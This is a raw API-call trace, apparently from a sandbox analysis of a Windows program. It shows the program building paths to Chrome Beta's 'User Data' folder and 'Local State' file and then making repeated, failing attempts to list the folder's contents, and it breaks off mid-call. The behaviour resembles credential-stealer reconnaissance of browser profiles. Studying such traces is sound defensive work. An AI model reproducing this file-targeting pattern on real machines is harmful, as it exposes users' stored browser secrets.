[0174.645] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Google\\Chrome Beta\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data" [0174.645] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data" [0174.645] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Local State" [0174.645] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\local state")) returned 0xffffffff [0174.645] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*") returned 66 [0174.645] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x650073, ftCreationTime.dwLowDateTime=0x200072, ftCreationTime.dwHighDateTime=0x610044, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x4c005c, ftLastWriteTime.dwLowDateTime=0x63006f, ftLastWriteTime.dwHighDateTime=0x6c0061, nFileSizeHigh=0x530020, nFileSizeLow=0x610074, dwReserved0=0x650074, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.645] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.645] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.645] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.645] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.646] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.646] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.646] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.646] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.646] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.646] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.646] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.646] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.646] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.646] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.646] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.646] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.646] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.646] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.646] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.647] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.647] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.647] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.647] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.647] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.647] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.647] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.647] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.647] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.647] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.647] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.647] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.647] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.648] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.648] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.648] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.648] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.648] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.648] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.648] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.648] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.648] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.648] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.648] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.648] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.648] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.648] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.649] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.649] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.649] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.649] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.649] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.649] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.649] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.649] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0174.649] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0174.649] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\*.*"), 